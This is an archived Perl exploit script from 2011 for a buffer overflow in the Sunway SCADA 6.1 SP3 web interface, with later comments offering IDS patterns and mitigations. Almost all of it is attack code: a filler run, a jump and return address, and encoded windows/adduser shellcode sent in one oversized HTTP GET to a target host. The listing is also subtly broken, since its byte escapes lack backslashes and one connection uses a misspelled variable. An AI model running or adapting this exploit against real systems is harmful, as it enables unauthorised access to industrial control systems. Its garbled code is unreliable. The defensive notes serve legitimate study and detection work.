Sunway SCADA 6.1 SP3 Buffer Overflow
Posted on 04 September 2011
#!/usr/bin/perl
# Exploit listing for Sunway SCADA 6.1 SP3 (posted 2011), kept as a reference
# of what the attack traffic looks like.  The script assembles an oversized
# request path from a filler run, a short jump, a fixed return address and an
# encoded payload, sends it in one HTTP/1.0 GET to TCP/80 on the host named by
# the first command-line argument, and then sends one plain GET on a second
# connection.  Nothing below validates the argument or checks that the writes
# succeeded.
#Sunway SCADA Add User Exploit for fun ;)
#Tested on XP SP1
#contact: n00bfuker@gmx.de
use IO::Socket;
use strict;

my $target = $ARGV[0];          # host to connect to, taken verbatim from the command line

# Pieces of the request path, concatenated in this order into $payload below.
# NOTE(review): as shown in this listing the literals hold the plain text
# "x.." sequences (e.g. "x90"), not byte escapes; whether that is the author's
# source or a rendering artefact cannot be told from here, so the bytes this
# exact text would send differ from what the trailing comments suggest.
my $otuzuc = "W" x 1127;        # 1127-byte filler preceding the overwrite point
my $otuz = "xebx06x90x90"; # jmp
my $seksen = "x98x15xD7x5A"; # ret
# windows/adduser - 446 bytes Encoder: x86/alpha_mixed
# USER=jenny, EXITFUNC=seh, PASS=pass
# (Payload header as given by the author: an encoded "add local user" payload.
#  The account name above is the host-side indicator a defender would look for.)
my $yetmisxxxx = "x89xe6xdbxc8xd9x76xf4x5fx57x59x49x49x49x49x49".
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a".
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32".
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49".
"x4bx4cx4bx58x47x34x45x50x43x30x43x30x4cx4bx50".
"x45x47x4cx4cx4bx43x4cx43x35x42x58x43x31x4ax4f".
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4a".
"x4bx50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31".
"x49x50x4cx59x4ex4cx4bx34x49x50x44x34x45x57x49".
"x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47x4b".
"x51x44x51x34x45x54x43x45x4ax45x4cx4bx51x4fx46".
"x44x45x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b".
"x51x4fx45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45".
"x51x4ax4bx4bx39x51x4cx47x54x45x54x49x53x51x4f".
"x50x31x4ax56x43x50x50x56x45x34x4cx4bx50x46x50".
"x30x4cx4bx51x50x44x4cx4cx4bx44x30x45x4cx4ex4d".
"x4cx4bx43x58x45x58x4dx59x4ax58x4cx43x49x50x42".
"x4ax50x50x45x38x4cx30x4cx4ax44x44x51x4fx43x58".
"x4ax38x4bx4ex4cx4ax44x4ex46x37x4bx4fx4ax47x42".
"x43x42x4dx43x54x46x4ex43x55x43x48x43x55x51x30".
"x46x4fx42x43x51x30x42x4ex42x45x44x34x47x50x44".
"x35x42x53x45x35x43x42x51x30x43x5ax43x55x42x4e".
"x42x4ex43x49x47x50x42x50x43x51x43x43x43x43x51".
"x30x46x4fx51x51x51x54x51x54x51x30x51x36x47x56".
"x47x50x42x4ex45x35x44x34x47x50x42x4cx42x4fx43".
"x53x43x51x42x4cx43x57x42x52x42x4fx42x55x44x30".
"x51x30x51x51x45x34x42x4dx42x49x42x4ex45x39x44".
"x33x44x34x43x42x43x51x44x34x42x4fx42x52x43x43".
"x47x50x43x5ax45x35x42x4ex42x4ex43x49x51x30x46".
"x4fx47x31x51x54x47x34x43x30x41x41";
my $sentamamlakardes = "x90" x 800; #junk (800 repetitions appended after the payload)
my $payload = $otuzuc.$otuz.$seksen.$yetmisxxxx.$sentamamlakardes;
#Bir basit kelama kurban gider krallar...
# (author's closing remark, Turkish; roughly "kings fall to a simple word...")

# Defender notes, limited to what the code above establishes:
#  - On the wire this is one HTTP/1.0 GET whose request path is well over 2 KB
#    however the literals are interpreted, and starts with 1127 repeated 'W'
#    characters followed by encoded data -- an easily matched IDS/WAF pattern.
#    A request-URI length limit on a reverse proxy in front of the HMI web
#    interface rejects it before it reaches the service.
#  - The payload header names a windows/adduser payload, so the host-side
#    indicator is an unexpected local account creation on the SCADA server
#    (Security event 4720 on Windows Vista and later).
#  - Mitigation: keep the SCADA HTTP port unreachable from untrusted networks
#    and apply the vendor fix for this issue (not identified in this listing).
my($SOCKET) = new IO::Socket::INET( Proto => "tcp", PeerAddr=> "$targer:80");
if (! defined $SOCKET) { die $!; }
print $SOCKET "GET /$payload HTTP/1.0 ";   # the request carrying the oversized path
close($SOCKET);
# A second, plain request on a fresh connection; the author does not state its purpose.
my($SOCKET2) = new IO::Socket::INET( Proto => "tcp", PeerAddr=> "$target:80");
if (! defined $SOCKET2) { die $!; }
print $SOCKET2 "GET / HTTP/1.0 ";
